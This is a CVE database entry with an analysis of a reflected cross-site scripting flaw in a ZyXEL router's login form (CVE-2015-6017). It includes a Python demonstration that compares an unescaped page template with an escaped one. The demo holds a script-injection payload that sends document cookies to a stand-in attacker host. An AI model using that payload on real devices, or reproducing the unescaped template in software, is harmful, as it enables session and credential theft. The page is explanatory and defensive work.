CVE-2015-6017

MEDIUM 4.3 / 10.0
Published: December 31, 2015 at 05:59 AM
Modified: April 12, 2025 at 10:46 AM
Source: cret@cert.org

Vulnerability Description

Multiple cross-site scripting (XSS) vulnerabilities in Forms/rpAuth_1 on ZyXEL P-660HW-T1 2 devices with ZyNOS firmware 3.40(AXH.0) allow remote attackers to inject arbitrary web script or HTML via the (1) LoginPassword or (2) hiddenPassword parameter.

CVSS Metrics

Base Score
4.3
Severity
MEDIUM
Vector String
AV:N/AC:M/Au:N/C:N/I:P/A:N

Weaknesses (CWE)

Source: nvd@nist.gov

AI Security Analysis

01 // Technical Summary

ZyXEL P-660HW-T1 2 routers running ZyNOS firmware 3.40(AXH.0) reflect the LoginPassword and hiddenPassword parameters of the Forms/rpAuth_1 login handler into the HTML response without encoding them, giving remote attackers a reflected cross-site scripting (XSS) vector. This is not arbitrary code execution on the router: attacker-supplied script runs in the victim's browser, in the origin of the router's web interface, and only after the victim has been induced to send the crafted request. That is what the CVSS v2 vector AV:N/AC:M/Au:N/C:N/I:P/A:N (score 4.3, Medium) records. The practical consequences are those of XSS against an administrative interface: capturing credentials entered into the login form, redirecting the user, and, if the victim already holds an authenticated session, issuing configuration-changing requests on the victim's behalf.

02 // Vulnerability Mechanism

Step 1: Payload Delivery: The attacker prepares a request to Forms/rpAuth_1 whose LoginPassword or hiddenPassword parameter carries HTML and JavaScript. Because the value is reflected into the response, the payload usually starts by closing whatever markup surrounds it (for example a quote and an angle bracket to leave an attribute value) and then opens a <script> tag. The script can be as simple as a proof-of-concept alert, or it can capture what is typed into the login form, redirect the browser, or issue further requests to the router.

Step 2: User Interaction: The attacker induces a user, typically the router's administrator, to send that request, for example through a phishing link or a page that auto-submits the form. The router's web interface must be reachable from the victim's browser, which for a home gateway usually means the victim is on the LAN side or remote management is enabled. This required interaction is why the CVSS vector carries AC:M rather than AC:L.

Step 3: Payload Execution: The router answers with the login page, reflecting the parameter value into the HTML without encoding it. The victim's browser cannot distinguish the injected markup from the page's own, so it parses the <script> element and runs it in the origin of the router's web interface.

Step 4: Attack Execution: The injected script acts with the privileges of that origin. On the login page that is enough to capture credentials the user enters, redirect the user to a phishing site, or read cookies that are not marked HttpOnly. Changing the router's configuration additionally requires that the victim already holds an authenticated session, because the script can only ride on whatever authentication the browser presents; the vulnerability itself does not bypass login (Au:N in the vector refers to the attacker, who needs no credentials to trigger the reflection).

03 // Deep Technical Analysis

The vulnerability stems from missing output encoding in the Forms/rpAuth_1 handler of the ZyNOS firmware: the LoginPassword and hiddenPassword parameters are taken from the request and written back into the HTML response as supplied. Nothing about the values is checked or neutralised before they are rendered, so an attacker who controls them controls part of the page, and the victim's browser executes whatever script that part contains. The root cause is the absence of context-appropriate HTML entity encoding on output (and, secondarily, of input validation); the application trusts the request data it reflects. ZyNOS is closed-source firmware, so the exact code path is not public, but the behaviour is consistent with the handler inserting the submitted password directly into the page, most plausibly into the value attribute of a form field, without escaping the characters that terminate that context. For an attribute value that means not only < and > but also the surrounding quote character, so the fix has to use a quote-aware encoder rather than bracket replacement alone. Neither parameter has a legitimate reason to be echoed back by a login handler at all, so simply not reflecting them is the cleanest remediation.
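As an added illustration (not code from this page, and not ZyXEL's code, since the ZyNOS firmware is closed-source), the Python stand-in below reproduces the reflection pattern described in steps 1 to 4 of the vulnerability mechanism and the output-encoding root cause discussed in this section. Only the form path Forms/rpAuth_1 and the two parameter names come from the advisory; the form layout, the attribute context, the attacker host attacker.example, the PAYLOAD string and the request body are assumptions constructed for the demonstration. Each rendered page is then fed through Python's html.parser to show what a browser would treat as live markup in the vulnerable and the hardened case.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Hypothetical stand-in for the ZyNOS login page (assumed layout, not the
# vendor's code).  Only the action path and the two parameter names are
# taken from the CVE description.
FORM_TEMPLATE = (
    '<html><body><form method="POST" action="/Forms/rpAuth_1">'
    '<input type="password" name="LoginPassword" value="{login}">'
    '<input type="hidden" name="hiddenPassword" value="{hidden}">'
    '<input type="submit" value="Login"></form></body></html>'
)


def _fields(body: str) -> tuple:
    """Pull the two reflected parameters out of a URL-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    return (params.get("LoginPassword", [""])[0],
            params.get("hiddenPassword", [""])[0])


def render_login_vulnerable(body: str) -> str:
    """The CVE-2015-6017 pattern: submitted values are pasted into the page verbatim."""
    login, hidden = _fields(body)
    return FORM_TEMPLATE.format(login=login, hidden=hidden)


def render_login_fixed(body: str) -> str:
    """Same page with attribute-context HTML entity encoding of every reflected value.

    quote=True matters: the values land inside double-quoted attributes, so the
    double quote must be encoded as well as <, > and &.
    """
    login, hidden = _fields(body)
    return FORM_TEMPLATE.format(login=html.escape(login, quote=True),
                                hidden=html.escape(hidden, quote=True))


class _PageInspector(HTMLParser):
    """Parse a rendered page the way a browser would, tracking inputs and script tags."""

    def __init__(self):
        super().__init__()
        self.inputs = {}
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.script_tags += 1
        elif tag == "input" and "name" in a:
            # html.parser unescapes entities in attribute values, as a browser does
            self.inputs[a["name"]] = a.get("value") or ""


def inspect_page(page: str) -> tuple:
    """Return (input name -> value as the browser sees it, number of <script> start tags)."""
    p = _PageInspector()
    p.feed(page)
    p.close()
    return p.inputs, p.script_tags


# Constructed attack request (assumed payload and attacker host): close the
# value attribute and the <input> tag, then open a script element.  The
# template itself contains no <script>, so any script tag found was injected.
PAYLOAD = '"><script>document.location="http://attacker.example/?c="+document.cookie</script>'
ATTACK_BODY = urlencode({"LoginPassword": PAYLOAD, "hiddenPassword": "x"})


def demo() -> dict:
    """Render the same request through both handlers and summarise what a browser would do."""
    vuln_inputs, vuln_scripts = inspect_page(render_login_vulnerable(ATTACK_BODY))
    fixed_inputs, fixed_scripts = inspect_page(render_login_fixed(ATTACK_BODY))
    return {
        "vulnerable_script_tags": vuln_scripts,                  # payload became live markup
        "vulnerable_login_value": vuln_inputs["LoginPassword"],  # attribute was cut short by the payload
        "fixed_script_tags": fixed_scripts,                      # payload stayed inert text
        "fixed_login_value": fixed_inputs["LoginPassword"],      # round-trips to the exact submitted string
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The hardened handler loses nothing functionally: the parser recovers the exact submitted string from the encoded attribute, while the injected `<script>` never becomes an element. The same check, run against captured responses from a real device with the benign `alert`-style payload, is how a tester confirms whether a reflected parameter is encoded for the context it lands in.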

CVE-2015-6017 - MEDIUM Severity (4.3) | Free CVE Database | 4nuxd